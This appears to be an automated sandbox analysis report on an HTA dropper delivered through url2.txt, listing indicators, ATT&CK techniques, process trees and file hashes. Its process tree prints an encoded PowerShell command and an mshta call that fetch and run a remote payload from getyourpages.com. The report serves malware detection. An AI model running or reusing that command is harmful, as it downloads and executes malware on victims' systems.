eba30e2d98a0a1feacac9768b78a8bbc077573d353871a50f6549d05e45d3d52

Analysis

max time kernel
149s
max time network
150s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
03/09/2024, 17:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

url2.txt
Size

46B
MD5

0399d8e2003c880376cfb6055157a418
SHA1

ef61164e73f64393bb69fb169868ef1aa8577e3e
SHA256

eba30e2d98a0a1feacac9768b78a8bbc077573d353871a50f6549d05e45d3d52
SHA512

3f5c6cd091ff79f93009f37e94ea1f2a8c0b0693975152befc5e624732dbfd1d9d8195428d99b47667c31b5d2dc51449c9c3b85a63410d2aade3a21e71103297

Score

10^/10

discovery

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://getyourpages.com/downloads/ter4

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
33	4064	mshta.exe
35	4064	mshta.exe
37	4064	mshta.exe
44	4552	mshta.exe

Downloads MZ/PE file
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133698584852948147"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4684	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2980	chrome.exe
2980	chrome.exe
1892	PowerShell.exe
1892	PowerShell.exe
1892	PowerShell.exe
1892	PowerShell.exe
2980	chrome.exe
2980	chrome.exe
996	powershell.exe
996	powershell.exe
996	powershell.exe
996	powershell.exe
4916	chrome.exe
4916	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe
Token: SeShutdownPrivilege	2980	chrome.exe
Token: SeCreatePagefilePrivilege	2980	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe
2980	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2980 wrote to memory of 4660	2980	chrome.exe	75
PID 2980 wrote to memory of 4660	2980	chrome.exe	75
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 3636	2980	chrome.exe	77
PID 2980 wrote to memory of 316	2980	chrome.exe	78
PID 2980 wrote to memory of 316	2980	chrome.exe	78
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79
PID 2980 wrote to memory of 3180	2980	chrome.exe	79

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\url2.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa66cc9758,0x7ffa66cc9768,0x7ffa66cc9778
  2⤵
  PID:4660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1564 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:2
  2⤵
  PID:3636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1844 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:8
  2⤵
  PID:316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2148 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:8
  2⤵
  PID:3180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2964 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:1
  2⤵
  PID:3712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2972 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:1
  2⤵
  PID:1060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3628 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:1
  2⤵
  PID:1396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4484 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:1
  2⤵
  PID:2476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3088 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:8
  2⤵
  PID:3480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4444 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:8
  2⤵
  PID:3040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3076 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:8
  2⤵
  PID:1884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3252 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:8
  2⤵
  PID:3704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:8
  2⤵
  PID:3584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2516 --field-trial-handle=1792,i,11024848182607401947,7944210687574733927,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4916

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2348

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4804

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AZwBlAHQAeQBvAHUAcgBwAGEAZwBlAHMALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZABzAC8AdABlAHIANAAiAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1892
- C:\Windows\system32\mshta.exe
  "C:\Windows\system32\mshta.exe" https://getyourpages.com/downloads/ter4
  2⤵
  - Blocklisted process makes network request
  PID:4064

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:4192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AZwBlAHQAeQBvAHUAcgBwAGEAZwBlAHMALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZABzAC8AdABlAHIANAAiAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:996
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" https://getyourpages.com/downloads/ter4
    3⤵
    - Blocklisted process makes network request
    PID:4552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
602fa7778b522b9bfcfe295676e9058f

SHA1
29197a3b52a90c3438a1fc3dee2478b6e64cdb4b

SHA256
cbcb96f092fe97cc88bc86069b63e95720eece9aa9a9b52be755b4af4d1e0e25

SHA512
d1a6e702c2ad53e5404deb0390bf38b6a64f6f4c6ed909afb6439ad4238fcca7b7edc8cebcd4688f66aaff1d30db5e494e960ced50610304f8e8c285f2b30a7d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
a8c747303107dd315b47fded077d64ea

SHA1
38fd9546f9ad24359d80c0322d098b58ad221689

SHA256
45e1137c27a1aba7d93fef5bfa407a49d3bf6229ba698558a342d8a0bba2702e

SHA512
2bd0945c62414b83947668f4419b509b8de070ac5a0416d9d18c13d7ea5676e86e0500adf27888c2615a338b4d067baeb1b2093147c110bb9f1165a5952075f8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
94c98bfc0b192932dfe5ce103617cbc7

SHA1
1f455468f27a78cc87f3de8d868f1966c37682b0

SHA256
d2d8ae9446755e169d123dd7f203570642ae205bb9256b6cfc1fc8bd883a47d4

SHA512
fe2f0026f67a83ad8a814fed3e485c18a6f7538beb9bb9b3b6824e3dc6a4951bebc514e7852e04239daf8972a898c05129d4d010a512d05481489da88a8c449f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
539B

MD5
2c708e7d76e00e062a2d568a7d374aa3

SHA1
c3138f563ee93abfbd3d2e5efc54f176f0e8be26

SHA256
85164844702646b4eeaedcb75610cd370bc02fc090f96cbee36b88e480dd4f4a

SHA512
44ce525fc485349ea0d4ba1c7a03a58ac9d289313826961ab81d94d272c451903573d2c76f60a16181e0619ccd6ac5fd8a6b5dc2040c00cf1d4684e363ab1d8a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
2483b298abef73bfe237231c2a310b66

SHA1
8ed416dea245a458db3dd76defc1a71ccd3586c6

SHA256
965c143bf077004f6511ccd90b8663ed590c7d4b0a59bc46d70378ae82bdefd9

SHA512
180a16fda414f3ba6bd82cc63aab99daf3cf55891bb6f23c45a672b16b64591d23fadbc1f3dc746bd5d162630f21ce985d3acbb31c3eea3ca92cb610a4447e3d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
d24b1986f3cb55f355e25612e645a95e

SHA1
1f713653df5b17d64bf0bfdec20a9460d5affc9a

SHA256
8f05c56e9b5968a1f83ced7722aa95fe15e261b7a396f65ee20510cbd1da5340

SHA512
6e3cb794f993610f03fc25cdedc7d0b442710272e01bc18cb2e4a4efdae7aca7a30d2763f3afd0489614ae99de200c99362332413c14f157ffdba8d2c25731c1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
304KB

MD5
ae1af0e71a1e9abbdfe6283c72de0981

SHA1
4e68b5863ae62e8ef55cf4e06ac18c9844d2e415

SHA256
64cf3e5c8e350e8dcdcb75bf288d9ad9af127811f8b7744c25a86216b150b999

SHA512
e3657c85088eeba87f6afb2f95a8fbf31b1c3f619033a551fa87c92112c9f3efbf332e295700812ed344b3420d3e3c9e25aae3ab21dfba1a9790204d5b95dccb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
337KB

MD5
8a9b2381ac6f1bdf0b1c3fee3206098d

SHA1
0d9683af0e76301cb612fc484dc76c4c9dec2188

SHA256
581e2d2ae4b3e61751622ce038528a3f46530b8c0e0352dd87d6d3741d614ba6

SHA512
11081ee6ac1501cd9177728bee05523ac770ee4577f47751e0714eeda935b1bd52b62a69c787f44d28be9c1fc59d8f2f45c1a87174829285428040909ddc70fc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
303KB

MD5
85e630c1aa905c509450d08235777b7a

SHA1
2655e8a371deb85be2c8ff5358bdb85da01f1bdc

SHA256
8309c7f5b8207fa3e3cbfad7fe8ae95c9e79b34d78f06093a235defc029c69f9

SHA512
ff1a938d707ded605134e04e70702a1be21e5cb4222b3c612ab519490d19c0271aa33b2c0c2ca7400d3c68d31f8aab403eaf54bd9d1a63537ba2da90ccdb1cb8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
137KB

MD5
be1f1d0ed674a023316b22c2bf031413

SHA1
05dc6c934ca576db5b5a32e4f56edf5ad937fd1d

SHA256
81d5c1ac12a45f15cf1daedf2917e848ec55dc60df03dc4e61813f5002e23e11

SHA512
7ddc5fe89ad8fafe656f2ac5066eff5b09b3ed2e203c3a27c1fddfa8e004fdfdbd93c9af31b2fa328b22635bb7e060c2d6dff3b07988d1ba2bd234469e34df1f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
b49a31b6e3a6771dbfa29b309842ef4f

SHA1
6b837a896a3008be212e7a3e297859b06b1d22af

SHA256
066845e6408685e957268c1c1bbb2240809c5b5751ae7973235490032eb51d81

SHA512
804d493bfafbe4be906dc9bb760839af0dc1e7ff4e15cec1b75c328b982f797ee5910e045d691138bbf8e5bcaba3fcfe354523acd90be3a6180cdae14af19029

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\E49JWOHD\ter4[1]

Filesize
334KB

MD5
0934e97a61a123b53aa420d55a92271b

SHA1
ec89e834f949bdc01202ae0990fe7f300b252c8f

SHA256
ed5a14add9b56893699d681db8587e9ca364d359bf147816624cd9a244a5a755

SHA512
37deb756d325465b4dcbb13cfc32f4a8429e5dac64f3734e9e2c8d0c615cd61f7f8357221b6a78259306cc37f4062956a17795518abc33739da22bff767ad5d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9dd047761619bfd84318d7002b425357

SHA1
91c9010fb53f97367b719f0b6f601bb6146809b0

SHA256
53b9d2e3de86b3f7fd618fa68074ce265325974e2db0533375ac69a0e5596feb

SHA512
e51475b2d5f08f45bc492fa3129760f646c4fc58a05a421cb0a5f66733680670b6acafcdd25a1744f85192cde5fe6f26b489ab3563c640c029bd0a7393777a3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A9R1vjsq9n_tsw0b0_1m4.tmp

Filesize
9KB

MD5
d80a3d394ccc6789a8af4bb65f90e397

SHA1
b248a6f97e672a3d06750406e677e446426ef05d

SHA256
a9544cd3f648861cc1fa2f2526059f580ba07147c8bee8f5846b49a96f497969

SHA512
1820148a0ae668a3161f163a4219c01efea255df8fee2a64898dcf2dbf85b868bcd8bbd76cc1afc5711b0c56c616a8c22b967d53af651bc3a3d043c915846221

Download Submit
C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log

Filesize
1KB

MD5
6665a429526952fcb6d2b9d7b2c000c9

SHA1
f30d04f7069b8af41d1b71c9df6f13de592762dc

SHA256
0a8d97618a2285719102f9edfcb967cb233c1091d4e30560b3fb24c975c07acb

SHA512
22e0a2daecf3acc0f71068cfdfede3313a5f8ba9c00de2da488abb047fbb051839ed9714a2ddaf74f2f15bb6ca7e1b4040a7e2184d3a46ed6e6c5a293be7324e

Download Submit
C:\Users\Admin\AppData\Local\Temp\JavaDeployReg.log

Filesize
13KB

MD5
1381fcba9d479838b01f7e1c5e32b1f6

SHA1
0295183fed28dd4f3465901641321fff8a552878

SHA256
39c5e46e789736d0af8444d221c937d449f5170c9a1813abb2f307e24fcfa2ab

SHA512
ae397c739770c5aa9d448631b454ada649310cfc2a724b047b3156ea434f2c6db96ac1d4824ddeb66212d587d6940737b994eafaac8a1d898de42b34893e58dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240404_122000165.html

Filesize
1004KB

MD5
ac74ecfac9f69a4c50c5b87aa25a0f37

SHA1
266d238414d1a3cfca9e48899febeceb9a4d339a

SHA256
fae42dbf7b2b7c20208f74fcbbbb08d4ae1245f2e4285a1d2f0c70ef39d23783

SHA512
